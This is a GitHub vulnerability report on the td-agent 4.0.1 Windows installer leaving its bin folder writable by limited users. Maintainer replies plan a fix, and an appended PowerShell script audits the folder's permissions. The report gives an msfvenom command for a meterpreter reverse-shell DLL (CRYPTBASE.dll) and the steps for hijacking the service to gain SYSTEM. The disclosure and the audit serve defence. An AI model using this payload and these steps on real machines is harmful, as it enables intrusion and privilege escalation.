Possible Vulnerability #3201
Comments
Yes, it seems that inappropriate permission is set.

note: In contrast to program files.

We need to fix this in the wixtoolset source layer. ref. https://github.com/fluent-plugins-nursery/td-agent-builder/blob/master/td-agent/msi/source.wxs

td-agent 4 fix is here:

for the record,

I'll close this issue when td-agent 4.1.0 is released.

https://td-agent-package-browser.herokuapp.com/4/windows |
POC.docx
Describe the bug
Inappropriate folder permissions, possible escalation of privileges on Windows
To Reproduce
Download URL:
http://packages.treasuredata.com.s3.amazonaws.com/4/windows/td-agent-4.0.1-x64.msi
Vulnerable Path:
C:\opt\td-agent\bin
Steps in reproducing the exploit:
Creating a DLL containing a reverse shell with the specific name that ruby.exe will search:
msfvenom -p windows/x64/meterpreter/reverse_tcp -ax64 -f dll LHOST=IPADRRESS LPORT=PORT > CRYPTBASE.dll
Setting up MSF console to listen for connection.
Copying the DLL file that we created to “C:\opt\td-agent\bin” using a limited account:
Normally, a limited user might not have the possibility of restarting the service.
A potential attacker can wait for the service to be restarted or he can restart the machine from the command line; when the service restarts, it will trigger the DLL and get NT Authority.
Expected behavior
N/A
Your Environment
Windows10
If you hit the problem with older fluentd version, try latest version first.
Your Configuration
Default
Your Error Log
No errors.
Additional context
Please add an appropriate contact method to submit possible vulnerabilities and POC's.
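
A way to check an installed host for the folder-permission condition this issue reports, as an added example (not code from the issue or from the td-agent project): the function lists allow-ACEs on a directory that let anyone other than SYSTEM, Administrators or TrustedInstaller create, replace or delete files in it. The function name `Get-WritableAce` and the list of ignored SIDs are assumptions of this example; the path is the one named in the issue.

```powershell
# Added example: audit a service's install directory for ACEs that let
# non-administrative principals create, replace or delete files in it.
# Function name and the ignored-SID list are assumptions of this example.
function Get-WritableAce {
    param([Parameter(Mandatory)][string]$Path)

    # Well-known SIDs skipped by this audit.
    $ignore = @(
        'S-1-5-18',      # NT AUTHORITY\SYSTEM
        'S-1-5-32-544',  # BUILTIN\Administrators
        'S-1-3-0',       # CREATOR OWNER (only applies to whoever could already create)
        'S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464'  # TrustedInstaller
    )

    # Specific rights that allow planting or swapping a file, plus the
    # GENERIC_WRITE (0x40000000) and GENERIC_ALL (0x10000000) bits that
    # inherit-only ACEs can carry unmapped.
    $mask = [int][System.Security.AccessControl.FileSystemRights]'WriteData, AppendData, Delete, DeleteSubdirectoriesAndFiles, ChangePermissions, TakeOwnership'
    $mask = $mask -bor 0x50000000

    $sidType = [System.Security.Principal.SecurityIdentifier]
    $acl = Get-Acl -LiteralPath $Path
    foreach ($ace in $acl.GetAccessRules($true, $true, $sidType)) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        $sid = $ace.IdentityReference.Value
        if ($ignore -contains $sid) { continue }
        if (([int]$ace.FileSystemRights -band $mask) -eq 0) { continue }

        # Resolve the SID to a name for display; keep the SID if that fails.
        try   { $name = $ace.IdentityReference.Translate([System.Security.Principal.NTAccount]).Value }
        catch { $name = $sid }

        [pscustomobject]@{
            Path      = $Path
            Principal = $name
            Rights    = $ace.FileSystemRights
            Inherited = $ace.IsInherited
            AppliesTo = "$($ace.InheritanceFlags) / $($ace.PropagationFlags)"
        }
    }
}

# Path taken from the issue; any row returned is a principal that can write there.
Get-WritableAce -Path 'C:\opt\td-agent\bin' | Format-Table -AutoSize
```

An empty result means no other principal can create or replace files in the directory; a row whose `Inherited` column is `True` points at the parent folder's ACL as the place the permission comes from.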